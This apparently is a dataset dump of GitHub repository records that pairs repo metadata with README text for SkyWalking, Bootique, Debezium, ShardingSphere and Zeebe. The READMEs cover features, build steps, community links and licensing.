[![Maven Central](https://img.shields.io/maven-central/v/org.apache.skywalking/apache-skywalking-apm.svg)](http://skywalking.apache.org/downloads/)
# Abstract
**SkyWalking** is an open-source APM system that provides monitoring, tracing and diagnosing capabilities for distributed systems in Cloud Native architectures.
* Distributed Tracing
* End-to-end distributed tracing. Service topology analysis, service-centric observability and APIs dashboards.
* Agents for your stack
* Java, .Net Core, PHP, NodeJS, Golang, LUA, Rust, C++, Client JavaScript and Python agents with active development and maintenance.
* eBPF early adoption
* Rover agent works as a monitor and profiler powered by eBPF to monitor Kubernetes deployments and diagnose CPU and network performance.
* Scaling
* 100+ billion telemetry data could be collected and analyzed from one SkyWalking cluster.
* Mature Telemetry Ecosystems Supported
* Metrics, Traces, and Logs from mature ecosystems are supported, e.g. Zipkin, OpenTelemetry, Prometheus, Zabbix, Fluentd
* Native APM Database
* BanyanDB, an observability database, created in 2022, aims to ingest, analyze and store telemetry/observability data.
* Consistent Metrics Aggregation
* SkyWalking native meter format and widely known metrics format(OpenTelemetry, Telegraf, Zabbix, e.g.) are processed through the same script pipeline.
* Log Management Pipeline
* Support log formatting, extract metrics, various sampling policies through script pipeline in high performance.
* Alerting and Telemetry Pipelines
* Support service-centric, deployment-centric, API-centric alarm rule setting. Support forwarding alarms and all telemetry data to 3rd party.
# Live Demo
- Find the [SkyWalking live demo with native UI and Grafana](https://skywalking.apache.org/#demo), and [screenshots](https://skywalking.apache.org/#arch) on our website.
- Follow the [showcase](https://skywalking.apache.org/docs/skywalking-showcase/next/readme/) to set up a preview deployment quickly.
# Documentation
- [Official documentation](https://skywalking.apache.org/docs/#SkyWalking)
# Downloads
Please head to the [releases page](https://skywalking.apache.org/downloads/) to download a release of Apache SkyWalking.
# Compiling project
Follow this [document](docs/en/guides/How-to-build.md).
# Code of conduct
This project adheres to the Contributor Covenant [code of conduct](https://www.apache.org/foundation/policies/conduct). By participating, you are expected to uphold this code.
Please follow the [REPORTING GUIDELINES](https://www.apache.org/foundation/policies/conduct#reporting-guidelines) to report unacceptable behavior.
# Contact Us
* Mail list: **dev@skywalking.apache.org**. Mail to `dev-subscribe@skywalking.apache.org`, follow the reply to subscribe the mail list.
* Send `Request to join SkyWalking slack` mail to the mail list(`dev@skywalking.apache.org`), we will invite you in.
* For Chinese speaker, send `[CN] Request to join SkyWalking slack` mail to the mail list(`dev@skywalking.apache.org`), we will invite you in.
* Twitter, [ASFSkyWalking](https://twitter.com/AsfSkyWalking)
* [bilibili B站 视频](https://space.bilibili.com/390683219)
* [掘金](https://juejin.cn/user/13673577331607/posts)
# Our Users
Hundreds of companies and organizations use SkyWalking for research, production, and commercial purposes.
Visit our [website](http://skywalking.apache.org/users/) to find the user page.
# License
[Apache 2.0 License.](LICENSE)
"
ag2s20150909/TTS,master,2586,316,2021-05-09T07:38:35Z,36177,70,,,
bootique/bootique,master,1412,282,2015-12-10T14:45:15Z,2958,28,Bootique is a minimally opinionated platform for modern runnable Java apps.,bootique dependency-injection guice java runnable-jar,"
[![build test deploy](https://github.com/bootique/bootique/workflows/build%20test%20deploy/badge.svg)](https://github.com/bootique/bootique/actions)
[![Maven Central](https://img.shields.io/maven-central/v/io.bootique/bootique.svg?colorB=brightgreen)](https://search.maven.org/artifact/io.bootique/bootique)
Bootique is a [minimally opinionated](https://medium.com/@andrus_a/bootique-a-minimally-opinionated-platform-for-modern-java-apps-644194c23872#.odwmsbnbh)
java launcher and integration technology. It is intended for building container-less runnable Java applications.
With Bootique you can create REST services, webapps, jobs, DB migration tasks, etc. and run them as if they were
simple commands. No JavaEE container required! Among other things Bootique is an ideal platform for
Java [microservices](http://martinfowler.com/articles/microservices.html), as it allows you to create a fully-functional
app with minimal setup.
Each Bootique app is a collection of modules interacting with each other via dependency injection. This GitHub project
provides Bootique core. Bootique team also develops a number of important modules. A full list is available
[here](http://bootique.io/docs/).
## Quick Links
* [WebSite](https://bootique.io)
* [Getting Started](https://bootique.io/docs/2.x/getting-started/)
* [Docs](https://bootique.io/docs/) - documentation collection for Bootique core and all standard
modules.
## Support
You have two options:
* [Open an issue](https://github.com/bootique/bootique/issues) on GitHub with a label of ""help wanted"" or ""question""
(or ""bug"" if you think you found a bug).
* Post a question on the [Bootique forum](https://groups.google.com/forum/#!forum/bootique-user).
## TL;DR
For the impatient, here is how to get started with Bootique:
* Declare the official module collection:
```xml
io.bootique.bombootique-bom3.0-M3pomimport
```
* Include the modules that you need:
```xml
io.bootique.jerseybootique-jerseyio.bootique.logbackbootique-logback
```
* Write your app:
```java
package com.foo;
import io.bootique.Bootique;
public class Application {
public static void main(String[] args) {
Bootique
.app(args)
.autoLoadModules()
.exec()
.exit();
}
}
```
It has ```main()``` method, so you can run it!
*For a more detailed tutorial proceed to [this link](https://bootique.io/docs/2.x/getting-started/).*
## Upgrading
See the ""maven-central"" badge above for the current production version of ```bootique-bom```.
When upgrading, don't forget to check [upgrade notes](https://github.com/bootique/bootique/blob/master/UPGRADE.md)
specific to your version.
"
debezium/debezium,main,9854,2385,2016-01-22T20:17:05Z,50856,64,Change data capture for a variety of databases. Please log issues at https://issues.redhat.com/browse/DBZ.,apache-kafka cdc change-data-capture database debezium event-streaming kafka kafka-connect kafka-producer,"[![License](http://img.shields.io/:license-apache%202.0-brightgreen.svg)](http://www.apache.org/licenses/LICENSE-2.0.html)
[![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.debezium/debezium-parent/badge.svg)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22io.debezium%22)
[![User chat](https://img.shields.io/badge/chat-users-brightgreen.svg)](https://debezium.zulipchat.com/#narrow/stream/302529-users)
[![Developer chat](https://img.shields.io/badge/chat-devs-brightgreen.svg)](https://debezium.zulipchat.com/#narrow/stream/302533-dev)
[![Google Group](https://img.shields.io/:mailing%20list-debezium-brightgreen.svg)](https://groups.google.com/forum/#!forum/debezium)
[![Stack Overflow](http://img.shields.io/:stack%20overflow-debezium-brightgreen.svg)](http://stackoverflow.com/questions/tagged/debezium)
Copyright Debezium Authors.
Licensed under the [Apache License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0).
The Antlr grammars within the debezium-ddl-parser module are licensed under the [MIT License](https://opensource.org/licenses/MIT).
English | [Chinese](README_ZH.md) | [Japanese](README_JA.md) | [Korean](README_KO.md)
# Debezium
Debezium is an open source project that provides a low latency data streaming platform for change data capture (CDC). You set up and configure Debezium to monitor your databases, and then your applications consume events for each row-level change made to the database. Only committed changes are visible, so your application doesn't have to worry about transactions or changes that are rolled back. Debezium provides a single model of all change events, so your application does not have to worry about the intricacies of each kind of database management system. Additionally, since Debezium records the history of data changes in durable, replicated logs, your application can be stopped and restarted at any time, and it will be able to consume all of the events it missed while it was not running, ensuring that all events are processed correctly and completely.
Monitoring databases and being notified when data changes has always been complicated. Relational database triggers can be useful, but are specific to each database and often limited to updating state within the same database (not communicating with external processes). Some databases offer APIs or frameworks for monitoring changes, but there is no standard so each database's approach is different and requires a lot of knowledged and specialized code. It still is very challenging to ensure that all changes are seen and processed in the same order while minimally impacting the database.
Debezium provides modules that do this work for you. Some modules are generic and work with multiple database management systems, but are also a bit more limited in functionality and performance. Other modules are tailored for specific database management systems, so they are often far more capable and they leverage the specific features of the system.
## Basic architecture
Debezium is a change data capture (CDC) platform that achieves its durability, reliability, and fault tolerance qualities by reusing Kafka and Kafka Connect. Each connector deployed to the Kafka Connect distributed, scalable, fault tolerant service monitors a single upstream database server, capturing all of the changes and recording them in one or more Kafka topics (typically one topic per database table). Kafka ensures that all of these data change events are replicated and totally ordered, and allows many clients to independently consume these same data change events with little impact on the upstream system. Additionally, clients can stop consuming at any time, and when they restart they resume exactly where they left off. Each client can determine whether they want exactly-once or at-least-once delivery of all data change events, and all data change events for each database/table are delivered in the same order they occurred in the upstream database.
Applications that don't need or want this level of fault tolerance, performance, scalability, and reliability can instead use Debezium's *embedded connector engine* to run a connector directly within the application space. They still want the same data change events, but prefer to have the connectors send them directly to the application rather than persist them inside Kafka.
## Common use cases
There are a number of scenarios in which Debezium can be extremely valuable, but here we outline just a few of them that are more common.
### Cache invalidation
Automatically invalidate entries in a cache as soon as the record(s) for entries change or are removed. If the cache is running in a separate process (e.g., Redis, Memcache, Infinispan, and others), then the simple cache invalidation logic can be placed into a separate process or service, simplifying the main application. In some situations, the logic can be made a little more sophisticated and can use the updated data in the change events to update the affected cache entries.
### Simplifying monolithic applications
Many applications update a database and then do additional work after the changes are committed: update search indexes, update a cache, send notifications, run business logic, etc. This is often called ""dual-writes"" since the application is writing to multiple systems outside of a single transaction. Not only is the application logic complex and more difficult to maintain, dual writes also risk losing data or making the various systems inconsistent if the application were to crash after a commit but before some/all of the other updates were performed. Using change data capture, these other activities can be performed in separate threads or separate processes/services when the data is committed in the original database. This approach is more tolerant of failures, does not miss events, scales better, and more easily supports upgrading and operations.
### Sharing databases
When multiple applications share a single database, it is often non-trivial for one application to become aware of the changes committed by another application. One approach is to use a message bus, although non-transactional message busses suffer from the ""dual-writes"" problems mentioned above. However, this becomes very straightforward with Debezium: each application can monitor the database and react to the changes.
### Data integration
Data is often stored in multiple places, especially when it is used for different purposes and has slightly different forms. Keeping the multiple systems synchronized can be challenging, but simple ETL-type solutions can be implemented quickly with Debezium and simple event processing logic.
### CQRS
The [Command Query Responsibility Separation (CQRS)](http://martinfowler.com/bliki/CQRS.html) architectural pattern uses a one data model for updating and one or more other data models for reading. As changes are recorded on the update-side, those changes are then processed and used to update the various read representations. As a result CQRS applications are usually more complicated, especially when they need to ensure reliable and totally-ordered processing. Debezium and CDC can make this more approachable: writes are recorded as normal, but Debezium captures those changes in durable, totally ordered streams that are consumed by the services that asynchronously update the read-only views. The write-side tables can represent domain-oriented entities, or when CQRS is paired with [Event Sourcing](http://martinfowler.com/eaaDev/EventSourcing.html) the write-side tables are the append-only event log of commands.
## Building Debezium
The following software is required to work with the Debezium codebase and build it locally:
* [Git](https://git-scm.com) 2.2.1 or later
* JDK 17 or later, e.g. [OpenJDK](http://openjdk.java.net/projects/jdk/)
* [Docker Engine](https://docs.docker.com/engine/install/) or [Docker Desktop](https://docs.docker.com/desktop/) 1.9 or later
* [Apache Maven](https://maven.apache.org/index.html) 3.8.4 or later
(or invoke the wrapper with `./mvnw` for Maven commands)
See the links above for installation instructions on your platform. You can verify the versions are installed and running:
$ git --version
$ javac -version
$ mvn -version
$ docker --version
### Why Docker?
Many open source software projects use Git, Java, and Maven, but requiring Docker is less common. Debezium is designed to talk to a number of external systems, such as various databases and services, and our integration tests verify Debezium does this correctly. But rather than expect you have all of these software systems installed locally, Debezium's build system uses Docker to automatically download or create the necessary images and start containers for each of the systems. The integration tests can then use these services and verify Debezium behaves as expected, and when the integration tests finish, Debezium's build will automatically stop any containers that it started.
Debezium also has a few modules that are not written in Java, and so they have to be required on the target operating system. Docker lets our build do this using images with the target operating system(s) and all necessary development tools.
Using Docker has several advantages:
1. You don't have to install, configure, and run specific versions of each external services on your local machine, or have access to them on your local network. Even if you do, Debezium's build won't use them.
1. We can test multiple versions of an external service. Each module can start whatever containers it needs, so different modules can easily use different versions of the services.
1. Everyone can run complete builds locally. You don't have to rely upon a remote continuous integration server running the build in an environment set up with all the required services.
1. All builds are consistent. When multiple developers each build the same codebase, they should see exactly the same results -- as long as they're using the same or equivalent JDK, Maven, and Docker versions. That's because the containers will be running the same versions of the services on the same operating systems. Plus, all of the tests are designed to connect to the systems running in the containers, so nobody has to fiddle with connection properties or custom configurations specific to their local environments.
1. No need to clean up the services, even if those services modify and store data locally. Docker *images* are cached, so reusing them to start containers is fast and consistent. However, Docker *containers* are never reused: they always start in their pristine initial state, and are discarded when they are shutdown. Integration tests rely upon containers, and so cleanup is handled automatically.
### Configure your Docker environment
The Docker Maven Plugin will resolve the docker host by checking the following environment variables:
export DOCKER_HOST=tcp://10.1.2.2:2376
export DOCKER_CERT_PATH=/path/to/cdk/.vagrant/machines/default/virtualbox/.docker
export DOCKER_TLS_VERIFY=1
These can be set automatically if using Docker Machine or something similar.
### Building the code
First obtain the code by cloning the Git repository:
$ git clone https://github.com/debezium/debezium.git
$ cd debezium
Then build the code using Maven:
$ mvn clean verify
The build starts and uses several Docker containers for different DBMSes. Note that if Docker is not running or configured, you'll likely get an arcane error -- if this is the case, always verify that Docker is running, perhaps by using `docker ps` to list the running containers.
### Don't have Docker running locally for builds?
You can skip the integration tests and docker-builds with the following command:
$ mvn clean verify -DskipITs
### Building just the artifacts, without running tests, CheckStyle, etc.
You can skip all non-essential plug-ins (tests, integration tests, CheckStyle, formatter, API compatibility check, etc.) using the ""quick"" build profile:
$ mvn clean verify -Dquick
This provides the fastest way for solely producing the output artifacts, without running any of the QA related Maven plug-ins.
This comes in handy for producing connector JARs and/or archives as quickly as possible, e.g. for manual testing in Kafka Connect.
### Running tests of the Postgres connector using the wal2json or pgoutput logical decoding plug-ins
The Postgres connector supports three logical decoding plug-ins for streaming changes from the DB server to the connector: decoderbufs (the default), wal2json, and pgoutput.
To run the integration tests of the PG connector using wal2json, enable the ""wal2json-decoder"" build profile:
$ mvn clean install -pl :debezium-connector-postgres -Pwal2json-decoder
To run the integration tests of the PG connector using pgoutput, enable the ""pgoutput-decoder"" and ""postgres-10"" build profiles:
$ mvn clean install -pl :debezium-connector-postgres -Ppgoutput-decoder,postgres-10
A few tests currently don't pass when using the wal2json plug-in.
Look for references to the types defined in `io.debezium.connector.postgresql.DecoderDifferences` to find these tests.
### Running tests of the Postgres connector with specific Apicurio Version
To run the tests of PG connector using wal2json or pgoutput logical decoding plug-ins with a specific version of Apicurio, a test property can be passed as:
$ mvn clean install -pl debezium-connector-postgres -Pwal2json-decoder
-Ddebezium.test.apicurio.version=1.3.1.Final
In absence of the property the stable version of Apicurio will be fetched.
### Running tests of the Postgres connector against an external database, e.g. Amazon RDS
Please note if you want to test against a *non-RDS* cluster, this test requires `` to be a superuser with not only `replication` but permissions
to login to `all` databases in `pg_hba.conf`. It also requires `postgis` packages to be available on the target server for some of the tests to pass.
$ mvn clean install -pl debezium-connector-postgres -Pwal2json-decoder \
-Ddocker.skip.build=true -Ddocker.skip.run=true -Dpostgres.host= \
-Dpostgres.user= -Dpostgres.password= \
-Ddebezium.test.records.waittime=10
Adjust the timeout value as needed.
See [PostgreSQL on Amazon RDS](debezium-connector-postgres/RDS.md) for details on setting up a database on RDS to test against.
### Running tests of the Oracle connector using Oracle XStream
$ mvn clean install -pl debezium-connector-oracle -Poracle-xstream,oracle-tests -Dinstantclient.dir=
### Running tests of the Oracle connector with a non-CDB database
$ mvn clean install -pl debezium-connector-oracle -Poracle-tests -Dinstantclient.dir= -Ddatabase.pdb.name=
### Running the tests for MongoDB with oplog capturing from an IDE
When running the test without maven, please make sure you pass the correct parameters to the execution. Look for the correct parameters in `.github/workflows/mongodb-oplog-workflow.yml` and
append them to the JVM execution parameters, prefixing them with `debezium.test`. As the execution will happen outside of the lifecycle execution, you need to start the MongoDB container manually
from the MongoDB connector directory
$ mvn docker:start -B -am -Passembly -Dcheckstyle.skip=true -Dformat.skip=true -Drevapi.skip -Dcapture.mode=oplog -Dversion.mongo.server=3.6 -Dorg.slf4j.simpleLogger.log.org.apache.maven.cli.transfer.Slf4jMavenTransferListener=warn -Dmaven.wagon.http.pool=false -Dmaven.wagon.httpconnectionManager.ttlSeconds=120 -Dcapture.mode=oplog -Dmongo.server=3.6
The relevant portion of the line will look similar to the following:
java -ea -Ddebezium.test.capture.mode=oplog -Ddebezium.test.version.mongo.server=3.6 -Djava.awt.headless=true -Dconnector.mongodb.members.auto.discover=false -Dconnector.mongodb.name=mongo1 -DskipLongRunningTests=true [...]
## Contributing
The Debezium community welcomes anyone that wants to help out in any way, whether that includes reporting problems, helping with documentation, or contributing code changes to fix bugs, add tests, or implement new features. See [this document](CONTRIBUTE.md) for details.
A big thank you to all the Debezium contributors!
"
apache/shardingsphere,master,19423,6602,2016-01-18T12:49:26Z,633877,997,"Distributed SQL transaction & query engine for data sharding, scaling, encryption, and more - on any database.",bigdata database database-cluster database-plus dba distributed-database distributed-sql-database distributed-transactions encrypt hacktoberfest mysql oltp postgresql rdbms shard sql,"## [Distributed SQL transaction & query engine for data sharding, scaling, encryption, and more - on any database.](https://shardingsphere.apache.org/)
**Official Website:** [https://shardingsphere.apache.org/](https://shardingsphere.apache.org/)
[![GitHub Release](https://img.shields.io/github/release/apache/shardingsphere.svg)](https://github.com/apache/shardingsphere/releases)
[![Lines of Code](https://sonarcloud.io/api/project_badges/measure?project=apache_shardingsphere&metric=ncloc)](https://sonarcloud.io/summary/new_code?id=apache_shardingsphere)
[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=apache_shardingsphere&metric=alert_status)](https://sonarcloud.io/summary/new_code?id=apache_shardingsphere)
[![Technical Debt](https://sonarcloud.io/api/project_badges/measure?project=apache_shardingsphere&metric=sqale_index)](https://sonarcloud.io/summary/new_code?id=apache_shardingsphere)
[![Maintainability Rating](https://sonarcloud.io/api/project_badges/measure?project=apache_shardingsphere&metric=sqale_rating)](https://sonarcloud.io/summary/new_code?id=apache_shardingsphere)
[![Security Rating](https://sonarcloud.io/api/project_badges/measure?project=apache_shardingsphere&metric=security_rating)](https://sonarcloud.io/summary/new_code?id=apache_shardingsphere)
[![codecov](https://codecov.io/gh/apache/shardingsphere/branch/master/graph/badge.svg)](https://codecov.io/gh/apache/shardingsphere)
[![OpenSSF Best Practices](https://bestpractices.coreinfrastructure.org/projects/5394/badge)](https://bestpractices.coreinfrastructure.org/projects/5394)
[![Slack](https://img.shields.io/badge/%20Slack-ShardingSphere%20Channel-blueviolet)](https://join.slack.com/t/apacheshardingsphere/shared_invite/zt-sbdde7ie-SjDqo9~I4rYcR18bq0SYTg)
[![Gitter](https://badges.gitter.im/shardingsphere/shardingsphere.svg)](https://gitter.im/shardingsphere/Lobby)
[![Twitter](https://img.shields.io/twitter/url/https/twitter.com/ShardingSphere.svg?style=social&label=Follow%20%40ShardingSphere)](https://twitter.com/ShardingSphere)
| **Stargazers Over Time** | **Contributors Over Time** |
|:---------------------------------------------------------------------------------------------------------------------:|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:|
| [![Stargazers Over Time](https://starchart.cc/apache/shardingsphere.svg)](https://starchart.cc/apache/shardingsphere) | [![Contributor over time](https://contributor-graph-api.apiseven.com/contributors-svg?chart=contributorOverTime&repo=apache/shardingsphere)](https://www.apiseven.com/en/contributor-graph?chart=contributorOverTime&repo=apache/shardingsphere) |
### OVERVIEW
Apache ShardingSphere is a distributed SQL transaction & query engine that allows for data sharding, scaling, encryption, and more - on any database. Our community's guiding development concept is Database Plus for creating a complete ecosystem that allows you to transform any database into a distributed database system.
It focuses on repurposing existing databases, by placing a standardized upper layer above existing and fragmented databases, rather than creating a new database.
The goal is to provide unified database services and minimize or eliminate the challenges caused by underlying databases' fragmentation.
This results in applications only needing to communicate with a single standardized service.
The concepts at the core of the project are `Connect`, `Enhance` and `Pluggable`.
- `Connect:` Flexible adaptation of database protocol, SQL dialect and database storage. It can quickly connect applications and heterogeneous databases.
- `Enhance:` Capture database access entry to provide additional features transparently, such as: redirect (sharding, readwrite-splitting and shadow), transform (data encrypt and mask), authentication (security, audit and authority), governance (circuit breaker and access limitation and analyze, QoS and observability).
- `Pluggable:` Leveraging the micro kernel and 3 layers pluggable mode, features and database ecosystem can be embedded flexibly. Developers can customize their ShardingSphere just like building with LEGO blocks.
ShardingSphere became an [Apache](https://apache.org/index.html#projects-list) Top-Level Project on April 16, 2020.
So far, ShardingSphere has been used by over [10,000 projects on GitHub](https://github.com/search?l=Maven+POM&q=shardingsphere+language%3A%22Maven+POM%22&type=Code).
### DOCUMENTATION📜
[![EN doc](https://img.shields.io/badge/document-English-blue.svg)](https://shardingsphere.apache.org/document/current/en/overview/)
[![CN doc](https://img.shields.io/badge/文档-中文版-blue.svg)](https://shardingsphere.apache.org/document/current/cn/overview/)
For full documentation & more details, visit: [Docs](https://shardingsphere.apache.org/document/current/en/overview/)
### CONTRIBUTION🚀🧑💻
For guides on how to get started and setup your environment, contributor & committer guides, visit: [Contribution Guidelines](https://shardingsphere.apache.org/community/en/involved/)
### Team
We deeply appreciate [community contributors](https://shardingsphere.apache.org/community/en/team) for their dedication to Apache ShardingSphere.
##
### COMMUNITY & SUPPORT💝🖤
:link: [Mailing List](https://shardingsphere.apache.org/community/en/involved/subscribe/). Best for: Apache community updates, releases, changes.
:link: [GitHub Issues](https://github.com/apache/shardingsphere/issues). Best for: larger systemic questions/bug reports or anything development related.
:link: [GitHub Discussions](https://github.com/apache/shardingsphere/discussions). Best for: technical questions & support, requesting new features, proposing new features.
:link: [Slack channel](https://join.slack.com/t/apacheshardingsphere/shared_invite/zt-sbdde7ie-SjDqo9~I4rYcR18bq0SYTg). Best for: instant communications and online meetings, sharing your applications.
:link: [Twitter](https://twitter.com/ShardingSphere). Best for: keeping up to date on everything ShardingSphere.
:link: [LinkedIn](https://www.linkedin.com/showcase/apache-shardingsphere/e). Best for: professional networking and career development with other ShardingSphere contributors.
##
### STATUS👀
:white_check_mark: Version 5.4.1: released :tada:
🔗 For the release notes, follow this link to the relevant [GitHub page](https://github.com/apache/shardingsphere/blob/master/RELEASE-NOTES.md).
:soon: Version 5.4.2
We are currently working towards our 5.4.2 milestone.
Keep an eye on the [milestones page](https://github.com/apache/shardingsphere/milestones) of this repo to stay up to date.
[comment]: <> (##)
[comment]: <> (### NIGHTLY BUILDS:)
[comment]: <> ()
[comment]: <> (A nightly build of ShardingSphere from the latest master branch is available. )
[comment]: <> (The package is updated daily and is available [here](http://117.48.121.24:8080).)
[comment]: <> (##)
[comment]: <> (**‼️ Notice:**)
[comment]: <> ()
[comment]: <> (Use this nightly build at your own risk! )
[comment]: <> (The branch is not always fully tested. )
[comment]: <> (The nightly build may contain bugs, and there may be new features added which may cause problems with your environment. )
##
### How it Works
Apache ShardingSphere includes 2 independent products: JDBC & Proxy.
They all provide functions of data scale-out, distributed transaction and distributed governance, applicable in a variety of situations such as Java-based isomorphism, heterogeneous language and Cloud-Native.
### ShardingSphere-JDBC
[![Maven Status](https://img.shields.io/maven-central/v/org.apache.shardingsphere/shardingsphere-jdbc.svg?color=green)](https://mvnrepository.com/artifact/org.apache.shardingsphere/shardingsphere-jdbc)
A lightweight Java framework providing extra services at the Java JDBC layer.
With the client end connecting directly to the database, it provides services in the form of a jar and requires no extra deployment and dependence.
:link: For more details, follow this [link to the official website](https://shardingsphere.apache.org/document/current/en/overview/#shardingsphere-jdbc).
### ShardingSphere-Proxy
[![Nightly-Download](https://img.shields.io/static/v1?label=nightly-builds&message=download&color=orange)](https://nightlies.apache.org/shardingsphere/)
[![Download](https://img.shields.io/badge/release-download-orange.svg)](https://www.apache.org/dyn/closer.lua/shardingsphere/5.3.2/apache-shardingsphere-5.3.2-shardingsphere-proxy-bin.tar.gz)
[![Docker Pulls](https://img.shields.io/docker/pulls/apache/shardingsphere-proxy.svg)](https://store.docker.com/community/images/apache/shardingsphere-proxy)
A transparent database proxy, providing a database server that encapsulates the database binary protocol to support heterogeneous languages.
Friendlier to DBAs, the MySQL and PostgreSQL version now provided can use any kind of terminal.
:link: For more details, follow this [link to the official website](https://shardingsphere.apache.org/document/current/en/overview/#shardingsphere-proxy).
### Hybrid Architecture
ShardingSphere-JDBC adopts a decentralized architecture, applicable to high-performance light-weight OLTP applications developed with Java.
ShardingSphere-Proxy provides static entry and all languages support, suitable for an OLAP application and sharding databases management and operation.
Through the combination of ShardingSphere-JDBC & ShardingSphere-Proxy together with a unified sharding strategy by the same registry center, the ShardingSphere ecosystem can build an application system suitable to all kinds of scenarios.
:link: More details can be found following this [link to the official website](https://shardingsphere.apache.org/document/current/en/overview/#hybrid-architecture).
##
### Solution
| *Solutions/Features* | *Distributed Database* | *Data Security* | *Database Gateway* | *Stress Testing* |
|----------------------|-------------------------|----------------------|-----------------------------------|------------------|
| | Data Sharding | Data Encryption | Heterogeneous Databases Supported | Shadow Database |
| | Read/write Splitting | Row Authority (TODO) | SQL Dialect Translate (TODO) | Observability |
| | Distributed Transaction | SQL Audit (TODO) | | |
| | Elastic Scale-out | SQL Firewall (TODO) | | |
| | High Availability | | | |
##
### Roadmap
![Roadmap](https://shardingsphere.apache.org/document/current/img/roadmap_en.png)
##
### How to Build Apache ShardingSphere
Check out [Wiki](https://github.com/apache/shardingsphere/wiki) section for details on how to build Apache ShardingSphere and a full guide on how to get started and setup your local dev environment.
##
### Landscapes
##
"
camunda/zeebe,main,3023,545,2016-03-20T03:38:04Z,252027,720,Distributed Workflow Engine for Microservices Orchestration,bpmn golang grpc hacktoberfest java microservices orchestration-framework workflow workflow-engine,"# Zeebe - Workflow Engine for Microservices Orchestration
[![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.camunda.zeebe/camunda-zeebe/badge.svg)](https://maven-badges.herokuapp.com/maven-central/io.camunda.zeebe/camunda-zeebe)
Zeebe provides visibility into and control over business processes that span multiple microservices. It is the engine that powers [Camunda Platform 8](https://camunda.com/platform/zeebe/).
**Why Zeebe?**
* Define processes visually in [BPMN 2.0](https://www.omg.org/spec/BPMN/2.0.2/)
* Choose your programming language
* Deploy with [Docker](https://www.docker.com/) and [Kubernetes](https://kubernetes.io/)
* Build processes that react to messages from [Kafka](https://kafka.apache.org/) and other message queues
* Scale horizontally to handle very high throughput
* Fault tolerance (no relational database required)
* Export process data for monitoring and analysis
* Engage with an active community
[Learn more at camunda.com](https://camunda.com/platform/zeebe/)
## Release Lifecycle
Our release cadence within major releases is a minor release every six months, with an alpha release on each of the five months between minor releases. Releases happen on the second Tuesday of the month, Berlin time (CET).
Minor releases are supported with patches for eighteen months after their release.
Here is a diagram illustrating the lifecycle of minor releases over a 27-month period:
```
2022 2023 2024
Ap Ma Ju Ju Au Se Oc No De Ja Fe Ma Ap Ma Ju Ju Au Se Oc No De Ja Fe Ma Ap Ma Ju
8.0--------------------------------------------------|
8.1--------------------------------------------------|
8.2-----------------------------------------
8.3-----------------------
8.4-----
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27
```
Here is a diagram illustrating the release schedule of the five alpha releases prior to an upcoming minor release over a 7-month period:
```
2022 2023
Oct Nov Dec Jan Feb Mar Apr
8.1-----------------------------------------------------------------------------
8.2-alpha1 8.2-alpha2 8.2-alpha3 8.2-alpha4 8.2-alpha5 8.2--
1 2 3 4 5 6 7
```
## Status
To learn more about what we're currently working on, check the [GitHub issues](https://github.com/camunda/zeebe/issues?q=is%3Aissue+is%3Aopen+sort%3Aupdated-desc) and the [latest commits](https://github.com/camunda/zeebe/commits/main).
## Helpful Links
* [Releases](https://github.com/camunda/zeebe/releases)
* [Pre-built Docker images](https://hub.docker.com/r/camunda/zeebe/tags?page=1&ordering=last_updated)
* [Building Docker images for other platforms](/zeebe/docs/building_docker_images.md)
* [Blog](https://camunda.com/blog/category/process-automation-as-a-service/)
* [Documentation Home](https://docs.camunda.io)
* [Issue Tracker](https://github.com/camunda/zeebe/issues)
* [User Forum](https://forum.camunda.io)
* [Slack Channel](https://www.camunda.com/slack)
* [Contribution Guidelines](/CONTRIBUTING.md)
## Recommended Docs Entries for New Users
* [What is Camunda Platform 8?](https://docs.camunda.io/docs/components/concepts/what-is-camunda-platform-8/)
* [Getting Started Tutorial](https://docs.camunda.io/docs/guides/)
* [Technical Concepts](https://docs.camunda.io/docs/components/zeebe/technical-concepts/)
* [BPMN Processes](https://docs.camunda.io/docs/components/modeler/bpmn/bpmn-primer/)
* [Installation and Configuration](https://docs.camunda.io/docs/self-managed/zeebe-deployment/)
* [Java Client](https://docs.camunda.io/docs/apis-clients/java-client/)
* [Go Client](https://docs.camunda.io/docs/apis-clients/go-client/)
* [Spring Integration](https://github.com/camunda-community-hub/spring-zeebe/)
## Contributing
Read the [Contributions Guide](/CONTRIBUTING.md).
## Code of Conduct
This project adheres to the [Camunda Code of Conduct](https://camunda.com/events/code-conduct/).
By participating, you are expected to uphold this code. Please [report](https://camunda.com/events/code-conduct/reporting-violations/)
unacceptable behavior as soon as possible.
## License
Zeebe source files are made available under the [Zeebe Community License
Version 1.1](/licenses/ZEEBE-COMMUNITY-LICENSE-1.1.txt) except for the parts listed
below, which are made available under the [Apache License, Version
2.0](/licenses/APACHE-2.0.txt). See individual source files for details.
Available under the [Apache License, Version 2.0](/licenses/APACHE-2.0.txt):
- Java Client ([clients/java](/clients/java))
- Go Client ([clients/go](/clients/go))
- Exporter API ([exporter-api](/exporter-api))
- Protocol ([protocol](/protocol))
- Gateway Protocol Implementation ([gateway-protocol-impl](/gateway-protocol-impl))
- BPMN Model API ([bpmn-model](/bpmn-model))
### Clarification on gRPC Code Generation
The Zeebe Gateway Protocol (API) as published in the
[gateway-protocol](/gateway-protocol/src/main/proto/gateway.proto) is licensed
under the [Zeebe Community License 1.1](/licenses/ZEEBE-COMMUNITY-LICENSE-1.1.txt). Using gRPC tooling to generate stubs for
the protocol does not constitute creating a derivative work under the Zeebe Community License 1.1 and no licensing restrictions are imposed on the
resulting stub code by the Zeebe Community License 1.1.
"
